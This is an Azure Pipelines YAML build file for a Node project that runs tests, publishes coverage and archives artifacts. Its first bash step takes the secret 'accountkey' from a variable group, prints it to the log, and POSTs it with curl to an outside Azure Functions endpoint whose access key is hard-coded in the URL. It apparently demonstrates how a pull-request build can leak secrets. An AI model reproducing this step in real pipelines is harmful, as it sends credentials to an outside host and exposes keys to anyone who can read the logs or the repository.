pool:
  vmImage: ubuntu-16.04

pr:
  autoCancel: false
  branches:
    include:
    - master
    
trigger:
  - master

variables:
- group: DevVarGroup1

steps:
  - bash: |
     ms="$MYSECRET is safe with me"
     echo $ms
     payload='{"name":"fluffy bananas '$MYSECRET'","password":"xyz"}'
     curl --header "Content-Type: application/json"   --request POST   --data "$payload"   https://functionskrwtsp.azurewebsites.net/api/HelloWorld?code=eyKsCLLWI/SFFyNhdonYY6ZRuqIftaXXoTm1q6sDDAo2tmh6/seN8w==
    env:
      MYSECRET: $(accountkey)
  - task: Npm@1
    inputs:
      command: install
  - script: 'npm test'
    displayName: 'Run unit tests'
    continueOnError: true
  - task: PublishTestResults@2
    displayName: 'Publish Test Results'
    condition: succeededOrFailed()
    inputs:
      testResultsFiles: $(System.DefaultWorkingDirectory)/test-report.xml
  - task: PublishCodeCoverageResults@1
    displayName: 'Publish Code Coverage'
    condition: 'in(variables[''Agent.JobStatus''], ''Succeeded'')'
    inputs:
      codeCoverageTool: Cobertura
      summaryFileLocation: '$(System.DefaultWorkingDirectory)/coverage/*coverage.xml'
      reportDirectory: $(System.DefaultWorkingDirectory)/coverage
  - task: ArchiveFiles@2
    displayName: 'Archive sources'
    inputs:
      rootFolderOrFile: $(Build.SourcesDirectory)
      includeRootFolder: false
  - task: CopyFiles@2
    displayName: 'Copy ARM templates'
    inputs:
      SourceFolder: deployment
      Contents: '*.json'
      TargetFolder: $(build.artifactstagingdirectory)/Templates
  - task: PublishBuildArtifacts@1
    displayName: 'Publish Artifact: drop'